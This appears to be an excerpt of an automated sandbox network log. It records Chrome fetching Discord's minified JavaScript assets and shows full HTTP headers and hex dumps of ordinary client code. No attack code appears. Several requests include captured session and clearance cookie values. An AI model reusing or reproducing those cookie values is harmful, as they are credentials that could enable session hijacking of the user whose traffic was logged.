                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    137192.168.2.549861162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC673OUTGET /assets/9390b4ecf309e4a58642.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 9392
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d110ee104357-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "620e3912ca81698d38461279457f47ba"
                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 18 Nov 2024 21:50:43 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWgVxX%2FxNPXUArI7I72LV5WLalM52gtFxny8sQ5oFr7GUZKSKzmM0w6ANe9e7Gk6Kdnp5ynHYVO9D8k3uZDOKfNMGaV9NAI%2B3BiFRFI4ztKeh%2BaJTfHhXMDNZrBO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC408INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 34 39 35 36 22 5d 2c 7b 39 38 36 31 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 6e 28 39 39 30 35 34 37 29 2c 6f 3d 6e 28 35 34 34 38 39 31 29 2c 72 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 38 38 31 30 35 32 29 2c 73 3d 6e 28 36 32 36 31 33 35 29 2c 75 3d 6e 28 35 37 33 32 36 31 29 2c 6c 3d 6e 28 35 34 35 38 35 31 29 2c 67 3d 6e 28 31 30 39 34 38 38 29 2c 64 3d 6e 28 37 39 34 30 39 39 29 2c 63 3d 6e 28 39 38 31 36 33 31 29 3b 6e 28 31 33 35 32 30 30 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["84956"],{986197:function(e,t,n){var i=n(990547),o=n(544891),r=n(570140),a=n(881052),s=n(626135),u=n(573261),l=n(545851),g=n(109488),d=n(794099),c=n(981631);n(135200);var
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 31 35 30 30 3b 69 66 28 21 21 28 30 2c 64 2e 76 63 29 28 29 29 7b 72 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 4f 4d 45 4c 4f 5f 53 55 47 47 45 53 54 49 4f 4e 53 5f 52 45 53 45 54 22 7d 29 3b 74 72 79 7b 76 61 72 20 6e 3b 6c 65 74 20 69 3d 61 77 61 69 74 20 6f 2e 74 6e 2e 67 65 74 28 7b 75 72 6c 3a 63 2e 41 4e 4d 2e 50 4f 4d 45 4c 4f 5f 53 55 47 47 45 53 54 49 4f 4e 53 5f 55 4e 41 55 54 48 45 44 2c 71 75 65 72 79 3a 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 7b 67 6c 6f 62 61 6c 5f 6e 61 6d 65 3a 65 7d 2c 74 69 6d 65 6f 75 74 3a 74 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 30 7d 29 3b 69 66 28 69 2e 6f 6b 26 26 28 6e 75 6c 6c 3d
                                                                                                                                                                                                                                                                                    Data Ascii: d 0!==arguments[1]?arguments[1]:1500;if(!!(0,d.vc)()){r.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"});try{var n;let i=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS_UNAUTHED,query:null==e?void 0:{global_name:e},timeout:t,rejectWithError:!0});if(i.ok&&(null=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1261INData Raw: 73 65 72 6e 61 6d 65 3a 65 2c 65 72 72 6f 72 3a 45 7d 29 3b 69 66 28 21 21 28 30 2c 6c 2e 45 29 28 29 29 74 72 79 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 75 2e 5a 2e 70 6f 73 74 28 7b 75 72 6c 3a 67 3f 63 2e 41 4e 4d 2e 50 4f 4d 45 4c 4f 5f 41 54 54 45 4d 50 54 5f 55 4e 41 55 54 48 45 44 3a 63 2e 41 4e 4d 2e 50 4f 4d 45 4c 4f 5f 41 54 54 45 4d 50 54 2c 62 6f 64 79 3a 7b 75 73 65 72 6e 61 6d 65 3a 65 7d 2c 74 72 61 63 6b 65 64 41 63 74 69 6f 6e 44 61 74 61 3a 7b 65 76 65 6e 74 3a 69 2e 4e 65 74 77 6f 72 6b 41 63 74 69 6f 6e 4e 61 6d 65 73 2e 50 4f 4d 45 4c 4f 5f 41 54 54 45 4d 50 54 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 72 65 71 75 65 73 74 65 64 5f 75 73 65 72 6e 61 6d 65 3a 65 7d 7d 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 31 7d 29 3b 74 2e
                                                                                                                                                                                                                                                                                    Data Ascii: sername:e,error:E});if(!!(0,l.E)())try{let t=await u.Z.post({url:g?c.ANM.POMELO_ATTEMPT_UNAUTHED:c.ANM.POMELO_ATTEMPT,body:{username:e},trackedActionData:{event:i.NetworkActionNames.POMELO_ATTEMPT,properties:{requested_username:e}},rejectWithError:!1});t.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 66 69 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 31 7d 2c 74 72 65 61 74 6d 65 6e 74 73 3a 5b 7b 69 64 3a 31 2c 6c 61 62 65 6c 3a 22 65 6e 61 62 6c 65 64 22 2c 63 6f 6e 66 69 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 7d 7d 5d 7d 29 2c 6f 3d 28 29 3d 3e 69 2e 67 65 74 43 75 72 72 65 6e 74 43 6f 6e 66 69 67 28 7b 6c 6f 63 61 74 69 6f 6e 3a 22 63 32 32 31 36 36 5f 31 22 7d 2c 7b 61 75 74 6f 54 72 61 63 6b 45 78 70 6f 73 75 72 65 3a 21 31 7d 29 2e 65 6e 61 62 6c 65 64 7d 2c 36 35 34 33 34 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 6c 65 74 20 69 3d 28 30 2c 6e 28 38 31 38 30 38 33 29 2e 42 29 28 7b 6b 69 6e 64 3a 22 75 73 65 72 22 2c 6c 61 62 65 6c 3a 22 50 6f 6d
                                                                                                                                                                                                                                                                                    Data Ascii: fig:{enabled:!1},treatments:[{id:1,label:"enabled",config:{enabled:!0}}]}),o=()=>i.getCurrentConfig({location:"c22166_1"},{autoTrackExposure:!1}).enabled},654344:function(e,t,n){n.d(t,{c:function(){return o}});let i=(0,n(818083).B)({kind:"user",label:"Pom
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 65 7d 75 73 65 72 6e 61 6d 65 53 75 67 67 65 73 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6d 69 67 72 61 74 69 6f 6e 2e 73 75 67 67 65 73 74 69 6f 6e 2e 75 73 65 72 6e 61 6d 65 7d 75 73 65 72 6e 61 6d 65 53 75 67 67 65 73 74 69 6f 6e 4c 6f 61 64 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 6d 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6d 69 67 72 61 74 69 6f 6e 2e 75 73 65 72 6e 61 6d 65 53 75 67 67 65 73 74 69 6f 6e 4c 6f 61 64 69 6e 67 7d 69 73 43 75 72 72 65 6e 74 55 73 65 72 6e 61 6d 65 49 6e 76 61 6c 69 64 28 29 7b 72 65 74 75 72 6e 20 6d 2e 63 75 72 72 65 6e 74 55 73 65 72 6e 61 6d 65 49 6e 76 61 6c 69 64 7d 77 61 73 52 65 67 69 73 74 72 61 74 69 6f 6e 53 75 67 67 65 73 74 69 6f 6e 46 65 74 63 68 65 64 28 65 29 7b 72
                                                                                                                                                                                                                                                                                    Data Ascii: e}usernameSuggestion(){return m.suggestions.migration.suggestion.username}usernameSuggestionLoading(){return m.suggestions.migration.usernameSuggestionLoading}isCurrentUsernameInvalid(){return m.currentUsernameInvalid}wasRegistrationSuggestionFetched(e){r
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 4f 4e 53 5f 46 45 54 43 48 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 75 73 65 72 6e 61 6d 65 53 75 67 67 65 73 74 69 6f 6e 4c 6f 61 64 69 6e 67 3a 74 7d 3d 65 3b 6d 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6d 69 67 72 61 74 69 6f 6e 2e 75 73 65 72 6e 61 6d 65 53 75 67 67 65 73 74 69 6f 6e 4c 6f 61 64 69 6e 67 3d 74 7d 2c 50 4f 4d 45 4c 4f 5f 52 45 47 49 53 54 52 41 54 49 4f 4e 5f 53 55 47 47 45 53 54 49 4f 4e 53 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 73 75 67 67 65 73 74 69 6f 6e 3a 74 2c 73 6f 75 72 63 65 3a 6e 7d 3d 65 3b 6d 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 3d 7b 73 75 67 67 65 73 74 69 6f 6e 3a 74 2c 73 6f 75 72 63 65 3a 6e 2c 66 65 74 63 68 65 64 3a 21 30 7d 2c 28 6e
                                                                                                                                                                                                                                                                                    Data Ascii: ONS_FETCH:function(e){let{usernameSuggestionLoading:t}=e;m.suggestions.migration.usernameSuggestionLoading=t},POMELO_REGISTRATION_SUGGESTIONS_SUCCESS:function(e){let{suggestion:t,source:n}=e;m.suggestions.registration={suggestion:t,source:n,fetched:!0},(n
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 67 67 65 73 74 69 6f 6e 73 3a 21 30 7d 7d 5d 7d 29 2c 6f 3d 28 29 3d 3e 69 2e 75 73 65 45 78 70 65 72 69 6d 65 6e 74 28 7b 6c 6f 63 61 74 69 6f 6e 3a 22 38 33 63 61 31 61 5f 33 22 7d 2c 7b 61 75 74 6f 54 72 61 63 6b 45 78 70 6f 73 75 72 65 3a 21 31 7d 29 2c 72 3d 28 29 3d 3e 69 2e 67 65 74 43 75 72 72 65 6e 74 43 6f 6e 66 69 67 28 7b 6c 6f 63 61 74 69 6f 6e 3a 22 38 33 63 61 31 61 5f 34 22 7d 2c 7b 61 75 74 6f 54 72 61 63 6b 45 78 70 6f 73 75 72 65 3a 21 31 7d 29 2e 73 75 67 67 65 73 74 69 6f 6e 73 7d 2c 33 36 33 35 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 31 39 32 33 37 39 29 2c 6f 3d 6e 28 33 39 32 37 31 31 29 2c 72 3d
                                                                                                                                                                                                                                                                                    Data Ascii: ggestions:!0}}]}),o=()=>i.useExperiment({location:"83ca1a_3"},{autoTrackExposure:!1}),r=()=>i.getCurrentConfig({location:"83ca1a_4"},{autoTrackExposure:!1}).suggestions},363577:function(e,t,n){n.d(t,{M:function(){return g}});var i=n(192379),o=n(392711),r=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC878INData Raw: 29 3d 3e 7b 6c 65 74 20 65 3d 6f 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 5b 74 2c 6e 5d 3d 6f 2e 75 73 65 53 74 61 74 65 28 30 29 2c 69 3d 6f 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 6e 65 77 20 61 2e 5a 28 65 3d 3e 7b 6c 65 74 5b 74 5d 3d 65 3b 72 65 74 75 72 6e 20 6e 28 74 2e 63 6f 6e 74 65 6e 74 52 65 63 74 2e 68 65 69 67 68 74 29 7d 29 2c 5b 5d 29 3b 72 65 74 75 72 6e 20 6f 2e 75 73 65 4c 61 79 6f 75 74 45 66 66 65 63 74 28 28 29 3d 3e 28 6e 75 6c 6c 21 3d 65 2e 63 75 72 72 65 6e 74 26 26 69 2e 6f 62 73 65 72 76 65 28 65 2e 63 75 72 72 65 6e 74 29 2c 28 29 3d 3e 69 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 29 2c 5b 69 5d 29 2c 7b 72 65 66 3a 65 2c 68 65 69 67 68 74 3a 74 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 6c 65 74 7b 73 68 6f 77 3a 74 2c
                                                                                                                                                                                                                                                                                    Data Ascii: )=>{let e=o.useRef(null),[t,n]=o.useState(0),i=o.useMemo(()=>new a.Z(e=>{let[t]=e;return n(t.contentRect.height)}),[]);return o.useLayoutEffect(()=>(null!=e.current&&i.observe(e.current),()=>i.disconnect()),[i]),{ref:e,height:t}};function l(e){let{show:t,


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    138192.168.2.549860162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1398OUTGET /assets/52015caea7357a7a60a9.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    Range: bytes=101503-101503
                                                                                                                                                                                                                                                                                    If-Range: "2088cf886851cb41b694b6059102a249"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC990INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Range: bytes 101503-101503/168252
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d110eb3c5e6a-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "2088cf886851cb41b694b6059102a249"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 13:28:32 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9lk5kTaaPhsGQUvYebw9O00BcvsXbGRV7ydljJvPfxpAQ%2BJK3Cj4P4Ez8qgx91TMoUQQbQGvZ0qx0Q0R%2FDwOu9V6Ir28PJIcX4ZI7j3QJi01M6zImefCcqNHnRj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1INData Raw: 2c
                                                                                                                                                                                                                                                                                    Data Ascii: ,


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    139192.168.2.549862162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC673OUTGET /assets/05bd1eb5dea5ee3387f4.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 5601
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d111596832f4-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "13ff42a071c43fa5521c11eb2f2ea914"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 21:50:02 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mprbyk8k6EOu9dJBjou6jAIz455PeJaWgHZ6HqcGG2Bgx5CtW3WMbvlO3Knu8JvmhbHKnlIpXutkftm3cZ%2F8m%2B6iqQEhbt%2BxkvA3CbfIOUEeHTx3Kh2XYhN84Fm0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC408INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 36 33 36 39 22 5d 2c 7b 34 33 38 38 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 61 3d 6e 28 34 34 32 38 33 37 29 2c 63 3d 6e 28 35 37 30 31 34 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["46369"],{438820:function(e,t,n){var i,a=n(442837),c=n(570140);function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 6c 21 3d 65 26 26 28 73 3d 65 29 2c 73 2e 63 61 6e 50 6c 61 79 57 6f 77 4d 6f 6d 65 6e 74 3d 21 31 2c 73 2e 69 73 46 65 74 63 68 69 6e 67 57 6f 77 4d 6f 6d 65 6e 74 4d 65 64 69 61 3d 21 31 2c 73 2e 77 6f 77 4d 6f 6d 65 6e 74 57 75 6d 70 75 73 4d 65 64 69 61 55 72 6c 3d 6e 75 6c 6c 7d 67 65 74 53 74 61 74 65 28 29 7b 72 65 74 75 72 6e 20 73 7d 67 65 74 20 63 61 6e 50 6c 61 79 57 6f 77 4d 6f 6d 65 6e 74 28 29 7b 72 65 74 75 72 6e 20 73 2e 63 61 6e 50 6c 61 79 57 6f 77 4d 6f 6d 65 6e 74 7d 67 65 74 20 69 73 46 65 74 63 68 69 6e 67 57 6f 77 4d 6f 6d 65 6e 74 4d 65 64 69 61 28 29 7b 72 65 74 75 72 6e 20 73 2e 69 73 46 65 74 63 68 69 6e 67 57 6f 77 4d 6f 6d 65 6e 74 4d 65 64 69 61 7d 67 65 74 20 77 6f 77 4d 6f 6d 65 6e 74 57 75 6d 70 75 73 4d 65 64 69 61 28 29
                                                                                                                                                                                                                                                                                    Data Ascii: l!=e&&(s=e),s.canPlayWowMoment=!1,s.isFetchingWowMomentMedia=!1,s.wowMomentWumpusMediaUrl=null}getState(){return s}get canPlayWowMoment(){return s.canPlayWowMoment}get isFetchingWowMomentMedia(){return s.isFetchingWowMomentMedia}get wowMomentWumpusMedia()
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 72 79 7b 4d 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 55 52 43 48 41 53 45 44 5f 49 54 45 4d 53 5f 46 45 53 54 49 56 49 54 59 5f 49 53 5f 46 45 54 43 48 49 4e 47 5f 57 4f 57 5f 4d 4f 4d 45 4e 54 5f 4d 45 44 49 41 22 2c 76 61 6c 75 65 3a 21 30 7d 29 3b 6c 65 74 20 74 3d 65 3f 53 2e 5a 3a 62 2e 5a 3b 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 31 32 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 39 38 30 70 78 29 22 29 2e 6d 61 74 63 68 65 73 7c 7c 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 69 6e 2d 68 65 69 67 68 74 3a 20 37 32 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 34 30 38 70 78 29 22 29 2e 6d 61 74 63 68 65 73 3f 74
